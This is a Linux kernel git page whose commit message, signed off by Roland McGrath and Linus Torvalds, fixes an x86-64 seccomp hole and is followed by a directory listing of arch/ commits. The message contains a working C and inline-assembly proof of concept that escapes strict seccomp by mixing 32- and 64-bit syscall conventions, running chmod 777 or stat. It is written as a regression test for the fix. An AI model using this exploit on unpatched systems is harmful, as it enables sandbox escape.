aha/arch
Roland McGrath 5b1017404a x86-64: seccomp: fix 32/64 syscall hole
On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
ljmp, and then use the "syscall" instruction to make a 64-bit system
call.  A 64-bit process make a 32-bit system call with int $0x80.

In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
the wrong system call number table.  The fix is simple: test TS_COMPAT
instead of TIF_IA32.  Here is an example exploit:

	/* test case for seccomp circumvention on x86-64

	   There are two failure modes: compile with -m64 or compile with -m32.

	   The -m64 case is the worst one, because it does "chmod 777 ." (could
	   be any chmod call).  The -m32 case demonstrates it was able to do
	   stat(), which can glean information but not harm anything directly.

	   A buggy kernel will let the test do something, print, and exit 1; a
	   fixed kernel will make it exit with SIGKILL before it does anything.
	*/

	#define _GNU_SOURCE
	#include <assert.h>
	#include <inttypes.h>
	#include <stdio.h>
	#include <linux/prctl.h>
	#include <sys/stat.h>
	#include <unistd.h>
	#include <asm/unistd.h>

	int
	main (int argc, char **argv)
	{
	  char buf[100];
	  static const char dot[] = ".";
	  long ret;
	  unsigned st[24];

	  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
	    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");

	#ifdef __x86_64__
	  assert ((uintptr_t) dot < (1UL << 32));
	  asm ("int $0x80 # %0 <- %1(%2 %3)"
	       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
	  ret = snprintf (buf, sizeof buf,
			  "result %ld (check mode on .!)\n", ret);
	#elif defined __i386__
	  asm (".code32\n"
	       "pushl %%cs\n"
	       "pushl $2f\n"
	       "ljmpl $0x33, $1f\n"
	       ".code64\n"
	       "1: syscall # %0 <- %1(%2 %3)\n"
	       "lretl\n"
	       ".code32\n"
	       "2:"
	       : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
	  if (ret == 0)
	    ret = snprintf (buf, sizeof buf,
			    "stat . -> st_uid=%u\n", st[7]);
	  else
	    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
	#else
	# error "not this one"
	#endif

	  write (1, buf, ret);

	  syscall (__NR_exit, 1);
	  return 2;
	}

Signed-off-by: Roland McGrath <roland@redhat.com>
[ I don't know if anybody actually uses seccomp, but it's enabled in
  at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-03-02 15:41:30 -08:00
..
alpha cpumask: Use cpu_*_mask accessors code: alpha 2009-02-16 17:32:00 +10:30
arm usb: musb: make Davinci *work* in mainline 2009-02-27 14:40:51 -08:00
avr32 [ARM] 5400/1: Add support for inverted rdy_busy pin for Atmel nand device controller 2009-02-16 21:40:39 +00:00
blackfin Blackfin arch: Remove outdated code 2009-02-04 16:49:45 +08:00
cris Merge branch 'syscalls' of git://git390.osdl.marist.edu/pub/scm/linux-2.6 2009-01-14 19:58:40 -08:00
frv FRV: in_interrupt() requires #inclusion of linux/hardirq.h not asm/hardirq.h now 2009-02-09 08:51:35 -08:00
h8300 Merge branch 'syscalls' of git://git390.osdl.marist.edu/pub/scm/linux-2.6 2009-01-14 19:58:40 -08:00
ia64 [IA64] Don't go beyond iosapic_intr_info's arraysize 2009-02-25 11:50:53 -08:00
m32r eeprom: More consistent symbol names 2009-01-26 21:19:57 +01:00
m68k m68k: atari - Rename "mfp" to "st_mfp" 2009-02-22 09:23:02 -08:00
m68knommu m68knommu: fix 5329 ColdFire periphal addressing 2009-01-27 16:42:03 +10:00
mips x86-64: seccomp: fix 32/64 syscall hole 2009-03-02 15:41:30 -08:00
mn10300 mn10300: fix typo && -> || in arch/mn10300/unit-asb2305/pci.c 2009-02-20 17:57:48 -08:00
parisc Documentation: move DMA-mapping.txt to Doc/PCI/ 2009-01-29 18:19:29 -08:00
powerpc x86-64: seccomp: fix 32/64 syscall hole 2009-03-02 15:41:30 -08:00
s390 [S390] fix "mem=" handling in case of standby memory 2009-02-19 15:19:19 +01:00
sh sh: ap325rxa: Revert ov772x support. 2009-02-27 15:41:14 +09:00
sparc x86-64: seccomp: fix 32/64 syscall hole 2009-03-02 15:41:30 -08:00
um uml: fix vde network backend in user mode linux 2009-02-20 17:57:48 -08:00
x86 x86-64: seccomp: fix 32/64 syscall hole 2009-03-02 15:41:30 -08:00
xtensa byteorder: make swab.h include asm/swab.h like a regular header 2009-01-14 19:56:50 -08:00
.gitignore
Kconfig [CVE-2009-0029] System call wrapper infrastructure 2009-01-14 14:15:16 +01:00